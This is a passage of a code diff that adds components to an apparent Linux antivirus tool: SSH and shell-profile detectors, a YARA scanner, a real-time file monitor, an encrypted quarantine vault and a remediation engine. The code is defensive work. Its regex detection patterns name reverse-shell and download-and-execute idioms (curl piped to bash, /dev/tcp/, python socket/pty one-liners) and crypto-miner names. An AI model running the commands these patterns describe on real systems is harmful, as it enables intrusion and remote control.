) -> List[DetectionResult]:
results: List[DetectionResult] = []
if file_path.name != "authorized_keys":
return results
# Flag if the file exists in an unexpected location.
path_str = str(file_path)
if not path_str.startswith("/root/") and "/.ssh/" not in path_str:
results.append(DetectionResult(
threat_name="Spyware.SSH.UnauthorizedKeysFile",
threat_type="SPYWARE",
severity="HIGH",
confidence=75,
details=f"authorized_keys found in unexpected location: {file_path}",
detector_name=self.name,
))
# Check for suspiciously many keys.
key_count = content.count(b"ssh-rsa") + content.count(b"ssh-ed25519") + content.count(b"ecdsa-sha2")
if key_count > 10:
results.append(DetectionResult(
threat_name="Spyware.SSH.ExcessiveKeys",
threat_type="SPYWARE",
severity="MEDIUM",
confidence=55,
details=f"{key_count} SSH keys in {file_path} — possible unauthorized access",
detector_name=self.name,
))
# command= prefix can force a shell command on login — often abused.
if b'command="' in content or b"command='" in content:
results.append(DetectionResult(
threat_name="Spyware.SSH.ForcedCommand",
threat_type="SPYWARE",
severity="MEDIUM",
confidence=60,
details=f"Forced command found in authorized_keys: {file_path}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Shell profile modifications
# ------------------------------------------------------------------
_PROFILE_FILES = {
".bashrc", ".bash_profile", ".profile", ".zshrc",
".bash_login", ".bash_logout",
}
_RE_PROFILE_SUSPICIOUS = re.compile(
rb"(?:"
rb"curl\s+[^\n]*\|\s*(?:sh|bash)"
rb"|wget\s+[^\n]*\|\s*(?:sh|bash)"
rb"|/dev/tcp/"
rb"|base64\s+--decode"
rb"|nohup\s+.*&"
rb"|eval\s+\$\("
rb"|python[23]?\s+-c\s+['\"]import\s+(?:socket|os|pty)"
rb")",
re.IGNORECASE,
)
def _check_shell_profile(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if file_path.name not in self._PROFILE_FILES:
return results
match = self._RE_PROFILE_SUSPICIOUS.search(content)
if match:
results.append(DetectionResult(
threat_name="Spyware.ShellProfile.SuspiciousEntry",
threat_type="SPYWARE",
severity="CRITICAL",
confidence=85,
details=(
f"Suspicious command in shell profile {file_path}: "
f"{match.group()[:100]!r}"
),
detector_name=self.name,
))
return results

View File

@@ -0,0 +1,200 @@
"""YARA-rule detector for AYN Antivirus.
Compiles and caches YARA rule files from the configured rules directory,
then matches them against scanned files. ``yara-python`` is treated as an
optional dependency — if it is missing the detector logs a warning and
returns no results.
"""
from __future__ import annotations
import logging
from pathlib import Path
from typing import Any, List, Optional
from ayn_antivirus.constants import DEFAULT_YARA_RULES_DIR
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Conditional import — yara-python is optional.
# ---------------------------------------------------------------------------
try:
import yara # type: ignore[import-untyped]
_YARA_AVAILABLE = True
except ImportError:
_YARA_AVAILABLE = False
yara = None # type: ignore[assignment]
# Severity mapping for YARA rule meta tags.
_META_SEVERITY_MAP = {
"critical": "CRITICAL",
"high": "HIGH",
"medium": "MEDIUM",
"low": "LOW",
}
class YaraDetector(BaseDetector):
"""Detect threats by matching YARA rules against file contents.
Parameters
----------
rules_dir:
Directory containing ``.yar`` / ``.yara`` rule files. Defaults to
the bundled ``signatures/yara_rules/`` directory.
"""
def __init__(self, rules_dir: str | Path = DEFAULT_YARA_RULES_DIR) -> None:
self.rules_dir = Path(rules_dir)
self._rules: Any = None # compiled yara.Rules object
self._rule_count: int = 0
self._loaded = False
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "yara_detector"
@property
def description(self) -> str:
return "Pattern matching using compiled YARA rules"
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
"""Match all loaded YARA rules against *file_path*.
Falls back to in-memory matching if *file_content* is provided.
"""
if not _YARA_AVAILABLE:
self._warn("yara-python is not installed — skipping YARA detection")
return []
if not self._loaded:
self.load_rules()
if self._rules is None:
return []
file_path = Path(file_path)
results: List[DetectionResult] = []
try:
if file_content is not None:
matches = self._rules.match(data=file_content)
else:
matches = self._rules.match(filepath=str(file_path))
except yara.Error as exc:
self._warn("YARA scan failed for %s: %s", file_path, exc)
return results
for match in matches:
meta = match.meta or {}
severity = _META_SEVERITY_MAP.get(
str(meta.get("severity", "")).lower(), "HIGH"
)
threat_type = meta.get("threat_type", "MALWARE").upper()
threat_name = meta.get("threat_name") or match.rule
matched_strings = []
try:
for offset, identifier, data in match.strings:
matched_strings.append(
f"{identifier} @ 0x{offset:x}"
)
except (TypeError, ValueError):
# match.strings format varies between yara-python versions.
pass
detail_parts = [f"YARA rule '{match.rule}' matched"]
if match.namespace and match.namespace != "default":
detail_parts.append(f"namespace={match.namespace}")
if matched_strings:
detail_parts.append(
f"strings=[{', '.join(matched_strings[:5])}]"
)
if meta.get("description"):
detail_parts.append(meta["description"])
results.append(DetectionResult(
threat_name=threat_name,
threat_type=threat_type,
severity=severity,
confidence=int(meta.get("confidence", 90)),
details=" | ".join(detail_parts),
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Rule management
# ------------------------------------------------------------------
def load_rules(self, rules_dir: Optional[str | Path] = None) -> None:
"""Compile all ``.yar`` / ``.yara`` files in *rules_dir*.
Compiled rules are cached in ``self._rules``. Call this again
after updating rule files to pick up changes.
"""
if not _YARA_AVAILABLE:
self._warn("yara-python is not installed — cannot load rules")
return
directory = Path(rules_dir) if rules_dir else self.rules_dir
if not directory.is_dir():
self._warn("YARA rules directory does not exist: %s", directory)
return
rule_files = sorted(
p for p in directory.iterdir()
if p.suffix.lower() in (".yar", ".yara") and p.is_file()
)
if not rule_files:
self._log("No YARA rule files found in %s", directory)
self._rules = None
self._rule_count = 0
self._loaded = True
return
# Build a filepaths dict for yara.compile(filepaths={...}).
filepaths = {}
for idx, rf in enumerate(rule_files):
namespace = rf.stem
filepaths[namespace] = str(rf)
try:
self._rules = yara.compile(filepaths=filepaths)
self._rule_count = len(rule_files)
self._loaded = True
self._log(
"Compiled %d YARA rule file(s) from %s",
self._rule_count,
directory,
)
except yara.SyntaxError as exc:
self._error("YARA compilation error: %s", exc)
self._rules = None
except yara.Error as exc:
self._error("YARA error: %s", exc)
self._rules = None
@property
def rule_count(self) -> int:
"""Number of rule files currently compiled."""
return self._rule_count
@property
def available(self) -> bool:
"""Return ``True`` if ``yara-python`` is installed."""
return _YARA_AVAILABLE

View File

@@ -0,0 +1,265 @@
"""Real-time file-system monitor for AYN Antivirus.
Uses the ``watchdog`` library to observe directories for file creation,
modification, and move events, then immediately scans the affected files
through the :class:`ScanEngine`. Supports debouncing, auto-quarantine,
and thread-safe operation.
"""
from __future__ import annotations
import logging
import threading
import time
from pathlib import Path
from typing import Any, Dict, List, Optional, Set
from watchdog.events import FileSystemEvent, FileSystemEventHandler
from watchdog.observers import Observer
from ayn_antivirus.config import Config
from ayn_antivirus.core.engine import ScanEngine, FileScanResult
from ayn_antivirus.core.event_bus import EventType, event_bus
from ayn_antivirus.quarantine.vault import QuarantineVault
logger = logging.getLogger(__name__)
# File suffixes that are almost always transient / editor artefacts.
_SKIP_SUFFIXES = frozenset((
".tmp", ".swp", ".swx", ".swo", ".lock", ".part",
".crdownload", ".kate-swp", ".~lock.", ".bak~",
))
# Minimum seconds between re-scanning the same path (debounce).
_DEBOUNCE_SECONDS = 2.0
# ---------------------------------------------------------------------------
# Watchdog event handler
# ---------------------------------------------------------------------------
class _FileEventHandler(FileSystemEventHandler):
"""Internal handler that bridges watchdog events to the scan engine.
Parameters
----------
monitor:
The owning :class:`RealtimeMonitor` instance.
"""
def __init__(self, monitor: RealtimeMonitor) -> None:
super().__init__()
self._monitor = monitor
# Only react to file events (not directories).
def on_created(self, event: FileSystemEvent) -> None:
if not event.is_directory:
self._monitor._on_file_event(event.src_path, "created")
def on_modified(self, event: FileSystemEvent) -> None:
if not event.is_directory:
self._monitor._on_file_event(event.src_path, "modified")
def on_moved(self, event: FileSystemEvent) -> None:
if not event.is_directory:
dest = getattr(event, "dest_path", None)
if dest:
self._monitor._on_file_event(dest, "moved")
# ---------------------------------------------------------------------------
# RealtimeMonitor
# ---------------------------------------------------------------------------
class RealtimeMonitor:
"""Watch directories and scan new / changed files in real time.
Parameters
----------
config:
Application configuration.
scan_engine:
A pre-built :class:`ScanEngine` instance used to scan files.
"""
def __init__(self, config: Config, scan_engine: ScanEngine) -> None:
self.config = config
self.engine = scan_engine
self._observer: Optional[Observer] = None
self._lock = threading.Lock()
self._recent: Dict[str, float] = {} # path → last-scan timestamp
self._running = False
# Optional auto-quarantine vault.
self._vault: Optional[QuarantineVault] = None
if config.auto_quarantine:
self._vault = QuarantineVault(config.quarantine_path)
# ------------------------------------------------------------------
# Public API
# ------------------------------------------------------------------
def start(self, paths: Optional[List[str]] = None, recursive: bool = True) -> None:
"""Begin monitoring *paths* (defaults to ``config.scan_paths``).
Parameters
----------
paths:
Directories to watch.
recursive:
Watch subdirectories as well.
"""
watch_paths = paths or self.config.scan_paths
with self._lock:
if self._running:
logger.warning("RealtimeMonitor is already running")
return
self._observer = Observer()
handler = _FileEventHandler(self)
for p in watch_paths:
pp = Path(p)
if not pp.is_dir():
logger.warning("Skipping non-existent path: %s", p)
continue
self._observer.schedule(handler, str(pp), recursive=recursive)
logger.info("Watching: %s (recursive=%s)", pp, recursive)
self._observer.start()
self._running = True
logger.info("RealtimeMonitor started — watching %d path(s)", len(watch_paths))
event_bus.publish(EventType.SCAN_STARTED, {
"type": "realtime_monitor",
"paths": watch_paths,
})
def stop(self) -> None:
"""Stop monitoring and wait for the observer thread to exit."""
with self._lock:
if not self._running or self._observer is None:
return
self._observer.stop()
self._observer.join(timeout=10)
with self._lock:
self._running = False
self._observer = None
logger.info("RealtimeMonitor stopped")
@property
def is_running(self) -> bool:
with self._lock:
return self._running
# ------------------------------------------------------------------
# Event callbacks (called by _FileEventHandler)
# ------------------------------------------------------------------
def on_file_created(self, path: str) -> None:
"""Scan a newly created file."""
self._scan_file(path, "created")
def on_file_modified(self, path: str) -> None:
"""Scan a modified file."""
self._scan_file(path, "modified")
def on_file_moved(self, path: str) -> None:
"""Scan a file that was moved/renamed into a watched directory."""
self._scan_file(path, "moved")
# ------------------------------------------------------------------
# Internal
# ------------------------------------------------------------------
def _on_file_event(self, path: str, event_type: str) -> None:
"""Central dispatcher invoked by the watchdog handler."""
if self._should_skip(path):
return
if self._is_debounced(path):
return
logger.debug("File event: %s %s", event_type, path)
# Dispatch to the named callback (also usable directly).
if event_type == "created":
self.on_file_created(path)
elif event_type == "modified":
self.on_file_modified(path)
elif event_type == "moved":
self.on_file_moved(path)
def _scan_file(self, path: str, reason: str) -> None:
"""Run the scan engine against a single file and handle results."""
fp = Path(path)
if not fp.is_file():
return
try:
result: FileScanResult = self.engine.scan_file(fp)
except Exception:
logger.exception("Error scanning %s", fp)
return
if result.threats:
logger.warning(
"THREAT detected (%s) in %s: %s",
reason,
path,
", ".join(t.threat_name for t in result.threats),
)
# Auto-quarantine if enabled.
if self._vault and fp.exists():
try:
threat = result.threats[0]
qid = self._vault.quarantine_file(fp, {
"threat_name": threat.threat_name,
"threat_type": threat.threat_type.name if hasattr(threat.threat_type, "name") else str(threat.threat_type),
"severity": threat.severity.name if hasattr(threat.severity, "name") else str(threat.severity),
"file_hash": result.file_hash,
})
logger.info("Auto-quarantined %s%s", path, qid)
except Exception:
logger.exception("Auto-quarantine failed for %s", path)
else:
logger.debug("Clean: %s (%s)", path, reason)
# ------------------------------------------------------------------
# Debounce & skip logic
# ------------------------------------------------------------------
def _is_debounced(self, path: str) -> bool:
"""Return ``True`` if *path* was scanned within the debounce window."""
now = time.monotonic()
with self._lock:
last = self._recent.get(path, 0.0)
if now - last < _DEBOUNCE_SECONDS:
return True
self._recent[path] = now
# Prune stale entries periodically.
if len(self._recent) > 5000:
cutoff = now - _DEBOUNCE_SECONDS * 2
self._recent = {
k: v for k, v in self._recent.items() if v > cutoff
}
return False
@staticmethod
def _should_skip(path: str) -> bool:
"""Return ``True`` for temporary / lock / editor backup files."""
name = Path(path).name.lower()
if any(name.endswith(s) for s in _SKIP_SUFFIXES):
return True
# Hidden editor temp files like .#foo or 4913 (vim temp).
if name.startswith(".#"):
return True
return False

View File

@@ -0,0 +1,378 @@
"""Encrypted quarantine vault for AYN Antivirus.
Isolates malicious files by encrypting them with Fernet (AES-128-CBC +
HMAC-SHA256) and storing them alongside JSON metadata in a dedicated
vault directory. Files can be restored, inspected, or permanently deleted.
"""
from __future__ import annotations
import fcntl
import json
import logging
import os
import re
import shutil
import stat
from datetime import datetime, timedelta
from pathlib import Path
from typing import Any, Dict, List, Optional
from uuid import uuid4
from cryptography.fernet import Fernet
from ayn_antivirus.constants import (
DEFAULT_QUARANTINE_PATH,
QUARANTINE_ENCRYPTION_KEY_FILE,
SCAN_CHUNK_SIZE,
)
from ayn_antivirus.core.event_bus import EventType, event_bus
logger = logging.getLogger(__name__)
class QuarantineVault:
"""Encrypted file quarantine vault.
Parameters
----------
quarantine_dir:
Directory where encrypted files and metadata are stored.
key_file_path:
Path to the Fernet key file. Generated automatically on first use.
"""
_VALID_QID_PATTERN = re.compile(r'^[a-f0-9]{32}$')
# Directories that should never be a restore destination.
_BLOCKED_DIRS = frozenset({
Path("/etc"), Path("/usr/bin"), Path("/usr/sbin"), Path("/sbin"),
Path("/bin"), Path("/boot"), Path("/root/.ssh"), Path("/proc"),
Path("/sys"), Path("/dev"), Path("/var/run"),
})
# Directories used for scheduled tasks — never restore into these.
_CRON_DIRS = frozenset({
Path("/etc/cron.d"), Path("/etc/cron.daily"),
Path("/etc/cron.hourly"), Path("/var/spool/cron"),
Path("/etc/systemd"),
})
def __init__(
self,
quarantine_dir: str | Path = DEFAULT_QUARANTINE_PATH,
key_file_path: str | Path = QUARANTINE_ENCRYPTION_KEY_FILE,
) -> None:
self.vault_dir = Path(quarantine_dir)
self.key_file = Path(key_file_path)
self._fernet: Optional[Fernet] = None
# Ensure directories exist.
self.vault_dir.mkdir(parents=True, exist_ok=True)
self.key_file.parent.mkdir(parents=True, exist_ok=True)
# ------------------------------------------------------------------
# Input validation
# ------------------------------------------------------------------
def _validate_qid(self, quarantine_id: str) -> str:
"""Validate quarantine ID is a hex UUID (no path traversal).
Raises :class:`ValueError` if the ID does not match the expected
32-character hexadecimal format.
"""
qid = quarantine_id.strip()
if not self._VALID_QID_PATTERN.match(qid):
raise ValueError(
f"Invalid quarantine ID format: {quarantine_id!r} "
f"(must be 32 hex chars)"
)
return qid
def _validate_restore_path(self, path_str: str) -> Path:
"""Validate restore path to prevent directory traversal.
Blocks restoring to sensitive system directories and scheduled-
task directories. Resolves all paths to handle symlinks like
``/etc`` → ``/private/etc`` on macOS.
"""
dest = Path(path_str).resolve()
for blocked in self._BLOCKED_DIRS:
resolved = blocked.resolve()
if dest == resolved or resolved in dest.parents or dest.parent == resolved:
raise ValueError(f"Refusing to restore to protected path: {dest}")
for cron_dir in self._CRON_DIRS:
resolved = cron_dir.resolve()
if resolved in dest.parents or dest.parent == resolved:
raise ValueError(
f"Refusing to restore to scheduled task directory: {dest}"
)
return dest
# ------------------------------------------------------------------
# Key management
# ------------------------------------------------------------------
def _get_fernet(self) -> Fernet:
"""Return the cached Fernet instance, loading or generating the key."""
if self._fernet is not None:
return self._fernet
if self.key_file.exists():
key = self.key_file.read_bytes().strip()
else:
key = Fernet.generate_key()
# Write key with restricted permissions.
fd = os.open(
str(self.key_file),
os.O_WRONLY | os.O_CREAT | os.O_TRUNC,
0o600,
)
try:
os.write(fd, key + b"\n")
finally:
os.close(fd)
logger.info("Generated new quarantine encryption key: %s", self.key_file)
self._fernet = Fernet(key)
return self._fernet
# ------------------------------------------------------------------
# Quarantine
# ------------------------------------------------------------------
def quarantine_file(
self,
file_path: str | Path,
threat_info: Dict[str, Any],
) -> str:
"""Encrypt and move a file into the vault.
Parameters
----------
file_path:
Path to the file to quarantine.
threat_info:
Metadata dict (typically from a detector result). Expected keys:
``threat_name``, ``threat_type``, ``severity``, ``file_hash``.
Returns
-------
str
The quarantine ID (UUID) for this entry.
"""
src = Path(file_path).resolve()
if not src.is_file():
raise FileNotFoundError(f"Cannot quarantine: {src} does not exist or is not a file")
qid = uuid4().hex
fernet = self._get_fernet()
# Lock, read, and encrypt (prevents TOCTOU races).
with open(src, "rb") as f:
fcntl.flock(f.fileno(), fcntl.LOCK_EX)
plaintext = f.read()
st = os.fstat(f.fileno())
fcntl.flock(f.fileno(), fcntl.LOCK_UN)
ciphertext = fernet.encrypt(plaintext)
# Gather metadata.
meta = {
"id": qid,
"original_path": str(src),
"original_permissions": oct(st.st_mode & 0o7777),
"threat_name": threat_info.get("threat_name", "Unknown"),
"threat_type": threat_info.get("threat_type", "MALWARE"),
"severity": threat_info.get("severity", "HIGH"),
"quarantine_date": datetime.utcnow().isoformat(),
"file_hash": threat_info.get("file_hash", ""),
"file_size": st.st_size,
}
# Write encrypted file + metadata.
enc_path = self.vault_dir / f"{qid}.enc"
meta_path = self.vault_dir / f"{qid}.json"
enc_path.write_bytes(ciphertext)
meta_path.write_text(json.dumps(meta, indent=2))
# Remove original.
try:
src.unlink()
logger.info("Quarantined %s%s (threat: %s)", src, qid, meta["threat_name"])
except OSError as exc:
logger.warning("Encrypted copy saved but failed to remove original %s: %s", src, exc)
event_bus.publish(EventType.QUARANTINE_ACTION, {
"action": "quarantine",
"quarantine_id": qid,
"original_path": str(src),
"threat_name": meta["threat_name"],
})
return qid
# ------------------------------------------------------------------
# Restore
# ------------------------------------------------------------------
def restore_file(
self,
quarantine_id: str,
restore_path: Optional[str | Path] = None,
) -> str:
"""Decrypt and restore a quarantined file.
Parameters
----------
quarantine_id:
UUID returned by :meth:`quarantine_file`.
restore_path:
Where to write the restored file. Defaults to the original path.
Returns
-------
str
Absolute path of the restored file.
Raises
------
ValueError
If the quarantine ID is malformed or the restore path points
to a protected system directory.
"""
qid = self._validate_qid(quarantine_id)
meta = self._load_meta(qid)
enc_path = self.vault_dir / f"{qid}.enc"
if not enc_path.exists():
raise FileNotFoundError(f"Encrypted file not found for quarantine ID {qid}")
# Validate restore destination.
if restore_path:
dest = self._validate_restore_path(str(restore_path))
else:
dest = self._validate_restore_path(str(meta["original_path"]))
fernet = self._get_fernet()
ciphertext = enc_path.read_bytes()
plaintext = fernet.decrypt(ciphertext)
dest.parent.mkdir(parents=True, exist_ok=True)
dest.write_bytes(plaintext)
# Restore original permissions, stripping SUID/SGID/sticky bits.
try:
perms = int(meta.get("original_permissions", "0o644"), 8)
perms = perms & 0o0777 # Keep only rwx bits
dest.chmod(perms)
except (ValueError, OSError):
pass
logger.info("Restored quarantined file %s%s", qid, dest)
event_bus.publish(EventType.QUARANTINE_ACTION, {
"action": "restore",
"quarantine_id": qid,
"restored_path": str(dest),
})
return str(dest.resolve())
# ------------------------------------------------------------------
# Delete
# ------------------------------------------------------------------
def delete_file(self, quarantine_id: str) -> bool:
"""Permanently remove a quarantined entry (encrypted file + metadata).
Returns ``True`` if files were deleted.
"""
qid = self._validate_qid(quarantine_id)
enc_path = self.vault_dir / f"{qid}.enc"
meta_path = self.vault_dir / f"{qid}.json"
deleted = False
for p in (enc_path, meta_path):
if p.exists():
p.unlink()
deleted = True
if deleted:
logger.info("Permanently deleted quarantine entry: %s", qid)
event_bus.publish(EventType.QUARANTINE_ACTION, {
"action": "delete",
"quarantine_id": qid,
})
return deleted
# ------------------------------------------------------------------
# Listing / info
# ------------------------------------------------------------------
def list_quarantined(self) -> List[Dict[str, Any]]:
"""Return a summary list of all quarantined items."""
items: List[Dict[str, Any]] = []
for meta_file in sorted(self.vault_dir.glob("*.json")):
try:
meta = json.loads(meta_file.read_text())
items.append({
"id": meta.get("id", meta_file.stem),
"original_path": meta.get("original_path", "?"),
"threat_name": meta.get("threat_name", "?"),
"quarantine_date": meta.get("quarantine_date", "?"),
"size": meta.get("file_size", 0),
})
except (json.JSONDecodeError, OSError):
continue
return items
def get_info(self, quarantine_id: str) -> Dict[str, Any]:
"""Return full metadata for a quarantine entry.
Raises ``FileNotFoundError`` if the ID is unknown.
"""
qid = self._validate_qid(quarantine_id)
return self._load_meta(qid)
def count(self) -> int:
"""Number of items currently in the vault."""
return len(list(self.vault_dir.glob("*.json")))
# ------------------------------------------------------------------
# Maintenance
# ------------------------------------------------------------------
def clean_old(self, days: int = 30) -> int:
"""Delete quarantine entries older than *days*.
Returns the number of entries removed.
"""
cutoff = datetime.utcnow() - timedelta(days=days)
removed = 0
for meta_file in self.vault_dir.glob("*.json"):
try:
meta = json.loads(meta_file.read_text())
qdate = datetime.fromisoformat(meta.get("quarantine_date", ""))
if qdate < cutoff:
qid = meta.get("id", meta_file.stem)
self.delete_file(qid)
removed += 1
except (json.JSONDecodeError, ValueError, OSError):
continue
if removed:
logger.info("Cleaned %d quarantine entries older than %d days", removed, days)
return removed
# ------------------------------------------------------------------
# Internal
# ------------------------------------------------------------------
def _load_meta(self, quarantine_id: str) -> Dict[str, Any]:
qid = self._validate_qid(quarantine_id)
meta_path = self.vault_dir / f"{qid}.json"
if not meta_path.exists():
raise FileNotFoundError(f"Quarantine metadata not found: {qid}")
return json.loads(meta_path.read_text())

View File

@@ -0,0 +1,544 @@
"""Automated remediation engine for AYN Antivirus.
Provides targeted fix actions for different threat types: permission
hardening, process killing, cron cleanup, SSH key auditing, startup
script removal, LD_PRELOAD cleaning, IP/domain blocking, and system
binary restoration via the system package manager.
All actions support a **dry-run** mode that logs intended changes without
modifying the system.
"""
from __future__ import annotations
import logging
import os
import re
import shutil
import stat
import subprocess
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any, Dict, List, Optional
import psutil
from ayn_antivirus.constants import SUSPICIOUS_CRON_PATTERNS
from ayn_antivirus.core.event_bus import EventType, event_bus
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Action record
# ---------------------------------------------------------------------------
@dataclass
class RemediationAction:
"""Describes a single remediation step."""
action: str
target: str
details: str = ""
success: bool = False
dry_run: bool = False
# ---------------------------------------------------------------------------
# AutoPatcher
# ---------------------------------------------------------------------------
class AutoPatcher:
"""Apply targeted remediations against discovered threats.
Parameters
----------
dry_run:
If ``True``, no changes are made — only the intended actions are
logged and returned.
"""
def __init__(self, dry_run: bool = False) -> None:
self.dry_run = dry_run
self.actions: List[RemediationAction] = []
# ------------------------------------------------------------------
# High-level dispatcher
# ------------------------------------------------------------------
def remediate_threat(self, threat_info: Dict[str, Any]) -> List[RemediationAction]:
"""Choose and execute the correct fix(es) for *threat_info*.
Routes on ``threat_type`` (MINER, ROOTKIT, SPYWARE, MALWARE, etc.)
and the available metadata.
"""
ttype = (threat_info.get("threat_type") or "").upper()
path = threat_info.get("path", "")
pid = threat_info.get("pid")
actions: List[RemediationAction] = []
# Kill associated process.
if pid:
actions.append(self.kill_malicious_process(int(pid)))
# Quarantine / permission fix for file-based threats.
if path and Path(path).exists():
actions.append(self.fix_permissions(path))
# Type-specific extras.
if ttype == "ROOTKIT":
actions.append(self.fix_ld_preload())
elif ttype == "MINER":
# Block known pool domains if we have one.
domain = threat_info.get("domain")
if domain:
actions.append(self.block_domain(domain))
ip = threat_info.get("ip")
if ip:
actions.append(self.block_ip(ip))
elif ttype == "SPYWARE":
if path and "cron" in path:
actions.append(self.remove_malicious_cron())
for a in actions:
self._publish(a)
self.actions.extend(actions)
return actions
# ------------------------------------------------------------------
# Permission fixes
# ------------------------------------------------------------------
def fix_permissions(self, path: str | Path) -> RemediationAction:
"""Remove SUID, SGID, and world-writable bits from *path*."""
p = Path(path)
action = RemediationAction(
action="fix_permissions",
target=str(p),
dry_run=self.dry_run,
)
try:
st = p.stat()
old_mode = st.st_mode
new_mode = old_mode
# Strip SUID / SGID.
new_mode &= ~stat.S_ISUID
new_mode &= ~stat.S_ISGID
# Strip world-writable.
new_mode &= ~stat.S_IWOTH
if new_mode == old_mode:
action.details = "Permissions already safe"
action.success = True
return action
action.details = (
f"Changing permissions: {oct(old_mode & 0o7777)}{oct(new_mode & 0o7777)}"
)
if not self.dry_run:
p.chmod(new_mode)
action.success = True
logger.info("fix_permissions: %s %s", action.details, "(dry-run)" if self.dry_run else "")
except OSError as exc:
action.details = f"Failed: {exc}"
logger.error("fix_permissions failed on %s: %s", p, exc)
return action
# ------------------------------------------------------------------
# Process killing
# ------------------------------------------------------------------
def kill_malicious_process(self, pid: int) -> RemediationAction:
"""Send SIGKILL to *pid*."""
action = RemediationAction(
action="kill_process",
target=str(pid),
dry_run=self.dry_run,
)
try:
proc = psutil.Process(pid)
action.details = f"Process: {proc.name()} (PID {pid})"
except psutil.NoSuchProcess:
action.details = f"PID {pid} no longer exists"
action.success = True
return action
if self.dry_run:
action.success = True
return action
try:
proc.kill()
proc.wait(timeout=5)
action.success = True
logger.info("Killed process %d (%s)", pid, proc.name())
except psutil.NoSuchProcess:
action.success = True
action.details += " (already exited)"
except (psutil.AccessDenied, psutil.TimeoutExpired) as exc:
action.details += f"{exc}"
logger.error("Failed to kill PID %d: %s", pid, exc)
return action
# ------------------------------------------------------------------
# Cron cleanup
# ------------------------------------------------------------------
def remove_malicious_cron(self, pattern: Optional[str] = None) -> RemediationAction:
"""Remove cron entries matching suspicious patterns.
If *pattern* is ``None``, uses all :pydata:`SUSPICIOUS_CRON_PATTERNS`.
"""
action = RemediationAction(
action="remove_malicious_cron",
target="/var/spool/cron + /etc/cron.d",
dry_run=self.dry_run,
)
patterns = [re.compile(pattern)] if pattern else [
re.compile(p) for p in SUSPICIOUS_CRON_PATTERNS
]
removed_lines: List[str] = []
cron_dirs = [
Path("/var/spool/cron/crontabs"),
Path("/var/spool/cron"),
Path("/etc/cron.d"),
]
for cron_dir in cron_dirs:
if not cron_dir.is_dir():
continue
for cron_file in cron_dir.iterdir():
if not cron_file.is_file():
continue
try:
lines = cron_file.read_text().splitlines()
clean_lines = []
for line in lines:
if any(pat.search(line) for pat in patterns):
removed_lines.append(f"{cron_file}: {line.strip()}")
else:
clean_lines.append(line)
if len(clean_lines) < len(lines) and not self.dry_run:
cron_file.write_text("\n".join(clean_lines) + "\n")
except OSError:
continue
action.details = f"Removed {len(removed_lines)} cron line(s)"
if removed_lines:
action.details += ": " + "; ".join(removed_lines[:5])
action.success = True
logger.info("remove_malicious_cron: %s", action.details)
return action
# ------------------------------------------------------------------
# SSH key cleanup
# ------------------------------------------------------------------
def clean_authorized_keys(self, path: Optional[str | Path] = None) -> RemediationAction:
"""Remove unauthorized keys from ``authorized_keys``.
Without *path*, scans all users' ``~/.ssh/authorized_keys`` plus
``/root/.ssh/authorized_keys``.
In non-dry-run mode, backs up the file before modifying.
"""
action = RemediationAction(
action="clean_authorized_keys",
target=str(path) if path else "all users",
dry_run=self.dry_run,
)
targets: List[Path] = []
if path:
targets.append(Path(path))
else:
# Root
root_ak = Path("/root/.ssh/authorized_keys")
if root_ak.exists():
targets.append(root_ak)
# System users from /home
home = Path("/home")
if home.is_dir():
for user_dir in home.iterdir():
ak = user_dir / ".ssh" / "authorized_keys"
if ak.exists():
targets.append(ak)
total_removed = 0
for ak_path in targets:
try:
lines = ak_path.read_text().splitlines()
clean: List[str] = []
for line in lines:
stripped = line.strip()
if not stripped or stripped.startswith("#"):
clean.append(line)
continue
# Flag lines with forced commands as suspicious.
if stripped.startswith("command="):
total_removed += 1
continue
clean.append(line)
if len(clean) < len(lines) and not self.dry_run:
backup = ak_path.with_suffix(".bak")
shutil.copy2(str(ak_path), str(backup))
ak_path.write_text("\n".join(clean) + "\n")
except OSError:
continue
action.details = f"Removed {total_removed} suspicious key(s) from {len(targets)} file(s)"
action.success = True
logger.info("clean_authorized_keys: %s", action.details)
return action
# ------------------------------------------------------------------
# Startup script cleanup
# ------------------------------------------------------------------
def remove_suspicious_startup(self, path: Optional[str | Path] = None) -> RemediationAction:
"""Remove suspicious entries from init scripts, systemd units, or rc.local."""
action = RemediationAction(
action="remove_suspicious_startup",
target=str(path) if path else "/etc/init.d, systemd, rc.local",
dry_run=self.dry_run,
)
suspicious_re = re.compile(
r"(?:curl|wget)\s+.*\|\s*(?:sh|bash)|xmrig|minerd|/dev/tcp/|nohup\s+.*&",
re.IGNORECASE,
)
targets: List[Path] = []
if path:
targets.append(Path(path))
else:
rc_local = Path("/etc/rc.local")
if rc_local.exists():
targets.append(rc_local)
for d in ("/etc/init.d", "/etc/systemd/system"):
dp = Path(d)
if dp.is_dir():
targets.extend(f for f in dp.iterdir() if f.is_file())
cleaned_count = 0
for target in targets:
try:
content = target.read_text()
lines = content.splitlines()
clean = [l for l in lines if not suspicious_re.search(l)]
if len(clean) < len(lines):
cleaned_count += len(lines) - len(clean)
if not self.dry_run:
backup = target.with_suffix(target.suffix + ".bak")
shutil.copy2(str(target), str(backup))
target.write_text("\n".join(clean) + "\n")
except OSError:
continue
action.details = f"Removed {cleaned_count} suspicious line(s) from {len(targets)} file(s)"
action.success = True
logger.info("remove_suspicious_startup: %s", action.details)
return action
# ------------------------------------------------------------------
# LD_PRELOAD cleanup
# ------------------------------------------------------------------
def fix_ld_preload(self) -> RemediationAction:
"""Remove all entries from ``/etc/ld.so.preload``."""
action = RemediationAction(
action="fix_ld_preload",
target="/etc/ld.so.preload",
dry_run=self.dry_run,
)
ld_path = Path("/etc/ld.so.preload")
if not ld_path.exists():
action.details = "File does not exist — nothing to fix"
action.success = True
return action
try:
content = ld_path.read_text().strip()
if not content:
action.details = "File is already empty"
action.success = True
return action
action.details = f"Clearing ld.so.preload (was: {content[:120]})"
if not self.dry_run:
backup = ld_path.with_suffix(".bak")
shutil.copy2(str(ld_path), str(backup))
ld_path.write_text("")
action.success = True
logger.info("fix_ld_preload: %s", action.details)
except OSError as exc:
action.details = f"Failed: {exc}"
